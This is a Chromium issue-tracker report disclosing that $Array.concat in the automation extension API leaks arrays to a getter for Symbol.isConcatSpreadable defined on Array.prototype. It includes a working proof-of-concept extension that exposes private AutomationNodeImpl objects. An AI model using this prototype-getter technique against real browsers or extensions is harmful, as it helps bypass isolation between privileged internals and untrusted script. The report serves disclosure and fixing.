$Array.concat leaks arguments
Reported by
jannhorn@googlemail.com,
Aug 19 2016
|
||
Issue description
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Steps to reproduce the problem:
1. In dev-channel Chrome, run an extension with the following files:
manifest.json:
{
"manifest_version": 2,
"name": "isConcatSpreadable demo",
"version": "1",
"background": { "scripts": ["background.js"]},
"automation": {},
"permissions": ["https://var.thejh.net/"]
}
background.js:
Array.prototype.__defineGetter__(Symbol.isConcatSpreadable, function() {
if (this.indexOf('accessKey') !== -1) {
this.push('RAW');
this.push('rootImpl');
debugger;
}
});
chrome.automation;
delete Array.prototype[Symbol.isConcatSpreadable];
chrome.tabs.create({url: 'https://var.thejh.net/'}, function(tab) {
chrome.automation.getTree(tab.id, function(tree) {
__defineGetter__.call(Reflect.getPrototypeOf(Reflect.getPrototypeOf(tree.rootImpl)), 'RAW', function() {
return this;
});
debugger;
});
})
2. Open the background page in inspector and restart the extension.
3. When the debugger statement is hit, try accessing the RAW property of any tree node, e.g. `tree.RAW` - it now reveals the backing AutomationNodeImpl instance, which as far as I can tell should not be exposed.
What is the expected behavior?
$Array.concat (and $String.replace and $String.split) should probably not look up symbol properties.
What went wrong?
The issue here is the following code in automation_node.js:
utils.expose(AutomationNode, AutomationNodeImpl, {
functions: [
[...]
],
readonly: $Array.concat(publicAttributes, [
'parent',
[...]
]),
});
The $Array.concat() call causes lookups of the Symbol.isConcatSpreadable property on publicAttributes and the array literal in the second argument (see step 7b of http://www.ecma-international.org/ecma-262/6.0/#sec-array.prototype.concat and http://www.ecma-international.org/ecma-262/6.0/#sec-isconcatspreadable). Because these are normal arrays, they have Array.prototype as prototype, causing getters for Symbol.isConcatSpreadable on Array.prototype to fire, leaking the array as `this`.
Now, in this case, you can access the private object backing any automation node by accessing its RAW property. This object seems to be pretty useless for an attacker, but similar issues could potentially lead to security problems in the future.
Did this work before? N/A
Chrome version: 52.0.2743.116 Channel: stable
OS Version:
Flash Version: Shockwave Flash 22.0 r0
,
Aug 24 2017
Issue has not been modified or commented on in the last 365 days, please re-open or file a new bug if this is still an issue. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
||
►
Sign in to add a comment |
||
Comment 1 by tkonch...@chromium.org
, Aug 24 2016